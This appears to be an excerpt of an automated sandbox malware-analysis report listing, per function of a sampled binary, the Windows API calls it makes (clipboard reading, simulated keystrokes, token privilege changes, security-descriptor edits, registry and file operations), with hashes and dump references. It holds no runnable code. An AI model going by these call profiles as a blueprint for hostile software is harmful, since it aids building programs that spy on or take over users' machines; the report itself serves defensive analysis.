• Opcode Fuzzy Hash: a6955c8f0dfc272768c83e7d56d21cf5d7f582fb0a5633cfe016d7614e223b74
• Instruction Fuzzy Hash: FEC09B35380305AFF6144B94BC4AF507754B749B10F044001F64995DE3C3F11490DA90
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000E9BB2
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0016961A
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0016965B
• GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0016969F
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001696C9
• SendMessageW.USER32 ref: 001696F2
• GetKeyState.USER32(00000011), ref: 0016978B
• GetKeyState.USER32(00000009), ref: 00169798
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 001697AE
• GetKeyState.USER32(00000010), ref: 001697B8
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 001697E9
• SendMessageW.USER32 ref: 00169810
• SendMessageW.USER32(?,00001030,?,00167E95), ref: 00169918
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0016992E
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00169941
• SetCapture.USER32(?), ref: 0016994A
• ClientToScreen.USER32(?,?), ref: 001699AF
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 001699BC
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001699D6
• ReleaseCapture.USER32 ref: 001699E1
• GetCursorPos.USER32(?), ref: 00169A19
• ScreenToClient.USER32(?,?), ref: 00169A26
• SendMessageW.USER32(?,00001012,00000000,?), ref: 00169A80
• SendMessageW.USER32 ref: 00169AAE
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00169AEB
• SendMessageW.USER32 ref: 00169B1A
• SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00169B3B
• SendMessageW.USER32(?,0000110B,00000009,?), ref: 00169B4A
• GetCursorPos.USER32(?), ref: 00169B68
• ScreenToClient.USER32(?,?), ref: 00169B75
• GetParent.USER32(?), ref: 00169B93
• SendMessageW.USER32(?,00001012,00000000,?), ref: 00169BFA
• SendMessageW.USER32 ref: 00169C2B
                                                                                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00169C84
                                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00169CB4
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00169CDE
                                                                                                                                                                                                                                          • SendMessageW.USER32 ref: 00169D01
                                                                                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00169D4E
                                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00169D82
                                                                                                                                                                                                                                            • Part of subcall function 000E9944: GetWindowLongW.USER32(?,000000EB), ref: 000E9952
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00169E05
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                                                                                                                                                                                                          • String ID: @GUI_DRAGID$F
                                                                                                                                                                                                                                          • API String ID: 3429851547-4164748364
                                                                                                                                                                                                                                          • Opcode ID: d691fda403cb03a389f2f0e76168aefa645cd9a5505c0409c90d9f02c847c305
                                                                                                                                                                                                                                          • Instruction ID: 63e98afe40a8151931614c2c04d04d42ea29c27cb259a9d3cc229b6e9350dc6c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d691fda403cb03a389f2f0e76168aefa645cd9a5505c0409c90d9f02c847c305
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96428C75204341AFDB24CF28CC44EAABBE9FF49314F14061AF699976A1D771E8A0CF91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 000EF998
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0012F474
• IsIconic.USER32(00000000), ref: 0012F47D
• ShowWindow.USER32(00000000,00000009), ref: 0012F48A
• SetForegroundWindow.USER32(00000000), ref: 0012F494
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0012F4AA
• GetCurrentThreadId.KERNEL32 ref: 0012F4B1
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0012F4BD
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0012F4CE
• AttachThreadInput.USER32(?,00000000,00000001), ref: 0012F4D6
• AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0012F4DE
• SetForegroundWindow.USER32(00000000), ref: 0012F4E1
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0012F4F6
• keybd_event.USER32(00000012,00000000), ref: 0012F501
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0012F50B
• keybd_event.USER32(00000012,00000000), ref: 0012F510
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0012F519
• keybd_event.USER32(00000012,00000000), ref: 0012F51E
• MapVirtualKeyW.USER32(00000012,00000000), ref: 0012F528
• keybd_event.USER32(00000012,00000000), ref: 0012F52D
• SetForegroundWindow.USER32(00000000), ref: 0012F530
• AttachThreadInput.USER32(?,000000FF,00000000), ref: 0012F557
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 4125248594-2988720461
• Opcode ID: 0a3c16402d3858bc14782e57650bf822cab37333d1b501f12fda72083f105f09
• Instruction ID: 80b564937a3171e84fb4ad632593dab0b3a8c6816f1d583a729499f9b2797eef
• Opcode Fuzzy Hash: 0a3c16402d3858bc14782e57650bf822cab37333d1b501f12fda72083f105f09
• Instruction Fuzzy Hash: 36315071B40228BEEB206BB59C4AFBF7E7CEB44B50F10402AF601E61D1C7F15951AAA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 001316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0013170D
  • Part of subcall function 001316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0013173A
  • Part of subcall function 001316C3: GetLastError.KERNEL32 ref: 0013174A
• LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00131286
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 001312A8
• CloseHandle.KERNEL32(?), ref: 001312B9
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 001312D1
• GetProcessWindowStation.USER32 ref: 001312EA
• SetProcessWindowStation.USER32(00000000), ref: 001312F4
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00131310
  • Part of subcall function 001310BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001311FC), ref: 001310D4
  • Part of subcall function 001310BF: CloseHandle.KERNEL32(?,?,001311FC), ref: 001310E9
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
• String ID: $default$winsta0
• API String ID: 22674027-1027155976
• Opcode ID: 584e8a727324b4cc7b4f8545f9abf224b3b4ac908fe9cf958d885dc0a7fa4cb7
• Instruction ID: bc4cf6b2464bf96c67a1da32789a89d2ee5976b21fb858089e1d760a3789a5c0
• Opcode Fuzzy Hash: 584e8a727324b4cc7b4f8545f9abf224b3b4ac908fe9cf958d885dc0a7fa4cb7
• Instruction Fuzzy Hash: CF817971900249BFDF219FA8DC49BFE7BB9EF04704F144129F911B62A0DBB59984CB60
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 001310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00131114
                                                                                                                                                                                                                                            • Part of subcall function 001310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 00131120
                                                                                                                                                                                                                                            • Part of subcall function 001310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 0013112F
                                                                                                                                                                                                                                            • Part of subcall function 001310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00130B9B,?,?,?), ref: 00131136
                                                                                                                                                                                                                                            • Part of subcall function 001310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0013114D
                                                                                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00130BCC
                                                                                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00130C00
                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00130C17
                                                                                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00130C51
                                                                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00130C6D
                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00130C84
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00130C8C
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00130C93
                                                                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00130CB4
                                                                                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00130CBB
                                                                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00130CEA
                                                                                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00130D0C
                                                                                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00130D1E
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00130D45
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00130D4C
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00130D55
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00130D5C
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00130D65
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00130D6C
                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00130D78
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00130D7F
                                                                                                                                                                                                                                            • Part of subcall function 00131193: GetProcessHeap.KERNEL32(00000008,00130BB1,?,00000000,?,00130BB1,?), ref: 001311A1
                                                                                                                                                                                                                                            • Part of subcall function 00131193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00130BB1,?), ref: 001311A8
                                                                                                                                                                                                                                            • Part of subcall function 00131193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00130BB1,?), ref: 001311B7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4175595110-0
                                                                                                                                                                                                                                          • Opcode ID: 4dc16af2ef0bbd26047c7653dd2e35abcfbe2b698a07dc0daf675199a02c093e
                                                                                                                                                                                                                                          • Instruction ID: df89d4622da0ce0a1771161a1e93f006926361d403ed5c4c01abb30a04f75d78
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dc16af2ef0bbd26047c7653dd2e35abcfbe2b698a07dc0daf675199a02c093e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1571667690020AEBDF11DFE4DC48BBEBBF8BF09310F044655F954A6291D7B1AA45CBA0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • OpenClipboard.USER32(0016CC08), ref: 0014EB29
                                                                                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0014EB37
                                                                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 0014EB43
                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0014EB4F
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0014EB87
                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0014EB91
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0014EBBC
                                                                                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0014EBC9
                                                                                                                                                                                                                                          • GetClipboardData.USER32(00000001), ref: 0014EBD1
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0014EBE2
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?), ref: 0014EC22
                                                                                                                                                                                                                                          • IsClipboardFormatAvailable.USER32(0000000F), ref: 0014EC38
                                                                                                                                                                                                                                          • GetClipboardData.USER32(0000000F), ref: 0014EC44
                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0014EC55
                                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0014EC77
                                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0014EC94
                                                                                                                                                                                                                                          • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0014ECD2
                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0014ECF3
                                                                                                                                                                                                                                          • CountClipboardFormats.USER32 ref: 0014ED14
                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0014ED59
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 420908878-0
                                                                                                                                                                                                                                          • Opcode ID: 82b6563b76daacaf500472f54d266d8f9907d0a8e655f76355a7081dee0decbb
                                                                                                                                                                                                                                          • Instruction ID: 7ebf04b1ba1f7e43d64acc23cb1abcaa7e2c0821f5b907cc5038c546825bdb65
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82b6563b76daacaf500472f54d266d8f9907d0a8e655f76355a7081dee0decbb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E618835204301AFD300EF64D898F7AB7E4BF84714F18451AF896972A2CB71E985CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 001469BE
                                                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00146A12
                                                                                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00146A4E
                                                                                                                                                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00146A75
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00146AB2
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00146ADF
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
• String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
• API String ID: 3830820486-3289030164
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00149663
• GetFileAttributesW.KERNEL32(?), ref: 001496A1
• SetFileAttributesW.KERNEL32(?,?), ref: 001496BB
• FindNextFileW.KERNEL32(00000000,?), ref: 001496D3
• FindClose.KERNEL32(00000000), ref: 001496DE
• FindFirstFileW.KERNEL32(*.*,?), ref: 001496FA
• SetCurrentDirectoryW.KERNEL32(?), ref: 0014974A
• SetCurrentDirectoryW.KERNEL32(00196B7C), ref: 00149768
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00149772
• FindClose.KERNEL32(00000000), ref: 0014977F
• FindClose.KERNEL32(00000000), ref: 0014978F
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 001497BE
• FindNextFileW.KERNEL32(00000000,?), ref: 00149819
• FindClose.KERNEL32(00000000), ref: 00149824
• FindFirstFileW.KERNEL32(*.*,?), ref: 00149840
• SetCurrentDirectoryW.KERNEL32(?), ref: 00149890
• SetCurrentDirectoryW.KERNEL32(00196B7C), ref: 001498AE
• FindNextFileW.KERNEL32(00000000,00000010), ref: 001498B8
• FindClose.KERNEL32(00000000), ref: 001498C5
• FindClose.KERNEL32(00000000), ref: 001498D5
  • Part of subcall function 0013DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0013DB00
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0015C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0015B6AE,?,?), ref: 0015C9B5
  • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015C9F1
  • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA68
  • Part of subcall function 0015C998: _wcslen.LIBCMT ref: 0015CA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0015BF3E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0015BFA9
• RegCloseKey.ADVAPI32(00000000), ref: 0015BFCD
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0015C02C
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0015C0E7
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0015C154
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0015C1E9
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0015C23A
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0015C2E3
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0015C382
• RegCloseKey.ADVAPI32(00000000), ref: 0015C38F
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
• String ID:
• API String ID: 3102970594-0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000D3A97,?,?,000D2E7F,?,?,?,00000000), ref: 000D3AC2
  • Part of subcall function 0013E199: GetFileAttributesW.KERNEL32(?,0013CF95), ref: 0013E19A
• FindFirstFileW.KERNEL32(?,?), ref: 0013D122
• DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0013D1DD
• MoveFileW.KERNEL32(?,?), ref: 0013D1F0
• DeleteFileW.KERNEL32(?,?,?,?), ref: 0013D20D
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0013D237
  • Part of subcall function 0013D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0013D21C,?,?), ref: 0013D2B2
• FindClose.KERNEL32(00000000,?,?,?), ref: 0013D253
• FindClose.KERNEL32(00000000), ref: 0013D264
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 1946585618-1173974218
• Opcode ID: 516cf734de4b8b7500adf121ecc21bcb3615f27ee7afe3cd44be916df4ef00e7
• Instruction ID: 175d79d136e353f866624e317bb06f42e4a183920e3d8812d28ba0a838af9315
• Opcode Fuzzy Hash: 516cf734de4b8b7500adf121ecc21bcb3615f27ee7afe3cd44be916df4ef00e7
• Instruction Fuzzy Hash: 30613D3190120D9BCF05EBE0EE929EEB7B5AF55300F644166E44277292EB315F09DB61
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
